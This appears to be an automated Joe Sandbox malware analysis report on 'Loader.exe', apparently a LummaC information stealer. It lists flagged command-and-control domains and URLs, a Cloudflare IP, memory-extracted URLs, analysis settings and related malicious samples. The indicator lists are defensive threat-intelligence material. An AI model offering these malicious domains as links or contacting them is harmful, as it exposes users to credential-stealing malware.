                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials11
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Loader.exe30%ReversingLabsWin32.Trojan.Generic
                Loader.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://stingyerasjhru.click/apibca100%Avira URL Cloudmalware
                https://stingyerasjhru.click/api=100%Avira URL Cloudmalware
                https://stingyerasjhru.click/sqg100%Avira URL Cloudmalware
                https://stingyerasjhru.click/api100%Avira URL Cloudmalware
                https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE0%Avira URL Cloudsafe
                https://stingyerasjhru.click/apiqS100%Avira URL Cloudmalware
                https://stingyerasjhru.click/apitreak100%Avira URL Cloudmalware
                https://stingyerasjhru.click/apintOS100%Avira URL Cloudmalware
                https://stingyerasjhru.click/Vg100%Avira URL Cloudmalware
                https://stingyerasjhru.click/apiC100%Avira URL Cloudmalware
                http://ocsp.pki.0%Avira URL Cloudsafe
                https://www.google.c(om/0%Avira URL Cloudsafe
                stingyerasjhru.click100%Avira URL Cloudmalware
                https://stingyerasjhru.click/xg100%Avira URL Cloudmalware
                https://stingyerasjhru.click/100%Avira URL Cloudmalware
                https://stingyerasjhru.click/Rd100%Avira URL Cloudmalware
                https://stingyerasjhru.click/F100%Avira URL Cloudmalware
                https://stingyerasjhru.click/C100%Avira URL Cloudmalware
                rabidcowse.shop100%Avira URL Cloudmalware
                https://stingyerasjhru.click/T100%Avira URL Cloudmalware
                https://stingyerasjhru.click/aRd100%Avira URL Cloudmalware
                https://stingyerasjhru.click/m$g100%Avira URL Cloudmalware
                wholersorie.shop100%Avira URL Cloudmalware
                https://stingyerasjhru.click/Og100%Avira URL Cloudmalware
                http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                https://stingyerasjhru.click/e100%Avira URL Cloudmalware
                cloudewahsj.shop100%Avira URL Cloudmalware
                https://stingyerasjhru.click/apir100%Avira URL Cloudmalware
                noisycuttej.shop100%Avira URL Cloudmalware
                https://stingyerasjhru.click/apie100%Avira URL Cloudmalware
                http://crl.micro0%Avira URL Cloudsafe
                nearycrepso.shop100%Avira URL Cloudmalware
                https://stingyerasjhru.click/bxg100%Avira URL Cloudmalware
                https://stingyerasjhru.click/apiV100%Avira URL Cloudmalware
                https://stingyerasjhru.click/s100%Avira URL Cloudmalware
                tirepublicerj.shop100%Avira URL Cloudmalware
                https://stingyerasjhru.click/apior100%Avira URL Cloudmalware
                https://stingyerasjhru.click/apiP100%Avira URL Cloudmalware
                framekgirus.shop100%Avira URL Cloudmalware
                abruptyopsn.shop100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                stingyerasjhru.click
                172.67.157.249
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://stingyerasjhru.click/apitrue
                  • Avira URL Cloud: malware
                  unknown
                  stingyerasjhru.clicktrue
                  • Avira URL Cloud: malware
                  unknown
                  rabidcowse.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  wholersorie.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  cloudewahsj.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  noisycuttej.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  nearycrepso.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  framekgirus.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  tirepublicerj.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  abruptyopsn.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabLoader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrowLoader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchLoader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/ac/?q=Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/downloadLoader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://stingyerasjhru.click/api=Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://stingyerasjhru.click/VgLoader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://stingyerasjhru.click/apiCLoader.exe, 00000003.00000003.91781075623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778841405.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103019944.000000000339C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXELoader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://stingyerasjhru.click/sqgLoader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://stingyerasjhru.click/apintOSLoader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-nLoader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://pki.goog/repo/certs/gtsr1.der04Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://stingyerasjhru.click/apiqSLoader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://www.google.com/images/branding/product/ico/googleg_alldp.icoLoader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stingyerasjhru.click/apibcaLoader.exe, 00000003.00000003.91074609704.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://stingyerasjhru.click/apitreakLoader.exe, 00000003.00000003.91074609704.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://www.eicar.org/download-anti-malware-testfile/:Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttpLoader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339BLoader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://ocsp.pki.Loader.exe, 00000003.00000003.91088526468.0000000005E79000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://x1.c.lencr.org/0Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://secure.eicar.org/eicar.com;Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.c(om/Loader.exe, 00000003.00000003.91061973141.0000000005E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://stingyerasjhru.click/xgLoader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292KLoader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://stingyerasjhru.click/Loader.exe, 00000003.00000003.91778448742.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778448742.0000000003428000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://stingyerasjhru.click/RdLoader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://secure.eicar.org/eicar.com.txtDLoader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bTLoader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://stingyerasjhru.click/FLoader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://ocsp.quovadisoffshore.com0Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://stingyerasjhru.click/CLoader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoLoader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://stingyerasjhru.click/TLoader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://stingyerasjhru.click/aRdLoader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://secure.eicar.org/eicar.comLoader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://stingyerasjhru.click/m$gLoader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeLoader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.pki.goog/gtsr1/gtsr1.crl0WLoader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://stingyerasjhru.click/OgLoader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://ocsp.rootca1.amazontrust.com0:Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://pki.goog/repository/0Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://secure.eicar.org/eicar.com.txt/Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.ecosia.org/newtab/Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.google.com/search?q=eicarLoader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://secure.eicar.org/eicar.com/Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://stingyerasjhru.click/eLoader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://stingyerasjhru.click/apirLoader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://ac.ecosia.org/autocomplete?q=Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.eicar.org/download-anti-malware-testfile/DownloadLoader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://stingyerasjhru.click/apieLoader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://crl.microLoader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://stingyerasjhru.click/sLoader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://stingyerasjhru.click/bxgLoader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://stingyerasjhru.click/apiVLoader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.quovadis.bm0Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQLoader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fireLoader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://gemini.google.com/app?q=Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://stingyerasjhru.click/apiPLoader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        https://stingyerasjhru.click/apiorLoader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        https://secure.eicar.org/eicar.com.txtLoader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          172.67.157.249
                                                                                                          stingyerasjhru.clickUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1582869
                                                                                                          Start date and time:2024-12-31 17:40:18 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 13m 33s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                          Run name:Suspected Instruction Hammering
                                                                                                          Number of analysed new started processes analysed:4
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:Loader.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 96%
                                                                                                          • Number of executed functions: 49
                                                                                                          • Number of non-executed functions: 98
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: Loader.exe
                                                                                                          TimeTypeDescription
                                                                                                          11:50:29API Interceptor3066076x Sleep call for process: Loader.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          172.67.157.249NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                            http://www.akagustos-kampanyasizlerle1.cloud/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              stingyerasjhru.clickNewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.249
                                                                                                              launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.58.80
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              CLOUDFLARENETUSPASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.96.1
                                                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.80.1
                                                                                                              Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 188.114.97.3
                                                                                                              LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 172.67.75.163
                                                                                                              Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.96.1
                                                                                                              Delta.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.96.1
                                                                                                              Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.52.90
                                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 188.114.97.3
                                                                                                              NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                                              • 104.21.24.64
                                                                                                              over.ps1Get hashmaliciousVidarBrowse
                                                                                                              • 172.64.41.3
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.249
                                                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.249
                                                                                                              Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.249
                                                                                                              Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.249
                                                                                                              Delta.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.249
                                                                                                              Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.249
                                                                                                              SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.249
                                                                                                              zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.249
